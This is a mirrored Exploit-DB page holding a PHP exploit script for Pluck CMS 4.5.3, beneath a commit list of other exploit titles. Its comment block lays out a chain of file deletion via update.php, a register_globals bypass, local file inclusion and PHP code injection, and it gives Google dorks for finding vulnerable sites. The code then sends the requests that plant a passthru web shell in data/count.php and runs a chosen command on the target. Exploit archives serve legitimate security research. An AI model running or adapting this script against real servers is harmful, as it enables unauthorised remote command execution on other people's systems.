bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/6492.php
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

182 lines
6.7 KiB
PHP
Executable file
Raw Blame History

<?php
/*
Pluck 4.5.3 update.php remote file corruption exploit
by Nine:Situations:Group::bookoo
our site: http://retrogod.altervista.org/
Google dorks: "powered by pluck" +admin
inurl:file=kop1.php
inurl:file=kop2.php
...
Exploit condition : register_globals = on
Note(!): regardless of php.ini settings, this code will turn your host in a blank page ...
Vulnerability:
this program carries a dangerous update.php script. If reachable
in the main folder, you can delete the files with language and theme preferences:
...
$step = $_GET['step'];
...
...
elseif($step == "3") {
echo "Rearranging files for compatibility with pluck 4.5...<br>";
copy("data/title.dat", "data/settings/title.dat");
unlink("data/settings/install.dat");
copy("data/install.dat", "data/settings/install.dat");
copy("data/options.php", "data/settings/options.php");
copy("data/pass.php", "data/settings/pass.php");
unlink("data/settings/langpref.php");
copy("data/inc/lang/langpref.php", "data/settings/langpref.php");
unlink("data/settings/themepref.php");
copy("data/inc/themes/themepref.php", "data/settings/themepref.php");
...
see the unlink() calls... the subsequent copy() has no results if you
don't place the source files there...
Now look at index.php, lines 21-26:
...
//Include security-enhancements
include ("data/inc/security.php");
//Include Translation data
include ("data/settings/langpref.php");
include ("data/inc/lang/en.php");
include ("data/inc/lang/$langpref");
...
The script now fails to include the langpref.php script and "langpref" variable is not initialized then,
***if register_globals=on*** you can include arbitraty files from local resources.
This check in security.php doesn't work as expected :
...
//Register Globals
//If Register Globals are ON, unset injected variables
if(isset($_REQUEST)) {
foreach ($_REQUEST as $key => $value) {
if(isset($GLOBALS[$key])) {
unset($GLOBALS[$key]);
}
}
}
...
ex: http://host/path/index.php?GLOBALS[langpref]=1
It unsets the "GLOBALS" key from the GLOBALS[] array, while langpref variable remains
overwritten...
You can include the /data/inc/page_editmeta.php script which contains a nice php injection:
...
if(isset($_POST['Submit'])) {
$data = "data/content/$editmeta";
include("data/inc/page_stripslashes.php");
$file = fopen($data, "w");
fputs($file, "<?php
\$title = \"$title\";
\$content = \"$content\";
\$contactinc = \"$contactinc\";
\$hidden = \"$hidden\";
\$description = \"$cont1\";
\$keywords = \"$sleutel\";
\$copyright = \"$copyr\";");
//Check if we also need to include albums
if ($incalbum) {
foreach ($incalbum as $name => $value) {
fputs($file, "\n\$incalbum['$name'] = \"yes\";");
} }
//Check if we also need to include blogs
if ($incblog) {
foreach ($incblog as $name => $value) {
fputs($file, "\n\$incblog['$name'] = \"yes\";");
} }
fputs($file, "\n ?>");
fclose($file);
...
also this check in /data/inc/page_editmeta.php is unuseful because
you call it from the main script:
...
//Make sure the file isn't accessed directly
if((!ereg("index.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("admin.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("install.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("login.php", $_SERVER['SCRIPT_FILENAME']))){
//Give out an "access denied" error
echo "access denied";
//Block all other code
exit();
}
...
We choose the /data/count.php to inject a php shell then you can launch commands on the target server.
*/
$cmd = "uname";//change here
error_reporting(7);
$host=$argv[1];
$path=$argv[2];
$argv[3] ? $port = (int) $argv[3] : $port = 80;
$argv[2] ? print("attackin'...\n") : die ("syntax: php ".$argv[0]." [host] [path] [[port]]");
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
$win ? dl("php_curl.dll") : dl("php_curl.so");
$url = "http://$host:$port";
function send($url,$header)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 0);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header);
$data = curl_exec($ch); if (curl_errno($ch)) {
print curl_error($ch)."\n";
} else {
curl_close($ch);
}
sleep(1);
return $data."\n";
}
$agent = "Mozilla</b>/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";
$header ="GET ".$path."update.php?step=3 HTTP/1.0\r\n";
$header.="Host: $host\r\nUser-Agent: $agent\r\nConnection: Close\r\n\r\n";
send($url,$header);
//oh, how evil... tested and working against PHP 5.2.4
$header ="POST ".$path."index.php HTTP/1.0\r\n";
$header.="Host: $host\r\nUser-Agent: $agent\r\n";
$header.="Content-Type: application/x-www-form-urlencoded\r\n";
$header.="Content-Length: 218\r\n";
$header.="Connection: Close\r\n\r\n";
$header.="Submit=1&GLOBALS[langpref]=../page_editmeta.php&GLOBALS[editmeta]=../count.php&GLOBALS[sleutel]=\$x{\$y{error_reporting(0)}}\$x{\$y{set_time_limit(0)}}\$x{\$y{print(my_flag)}}\$x{\$y{passthru(\$_SERVER[HTTP_CMD])}}\$x{\$y{die()}}";
send($url,$header);
$header ="GET ".$path."data/count.php HTTP/1.0\r\n";
$header.="Host: $host\r\nUser-Agent: $agent\r\n";
$header.="CMD: $cmd\r\n";
$header.="Connection: Close\r\n\r\n";
$out=send($url,$header);
$out=explode("my_flag",$out);
count($out)==2 ? print("exploit succeeded...\n$out[1]") : print("exploit failed... :(\n");
?>
# milw0rm.com [2008-09-19]
Reference in a new issue View git blame Copy permalink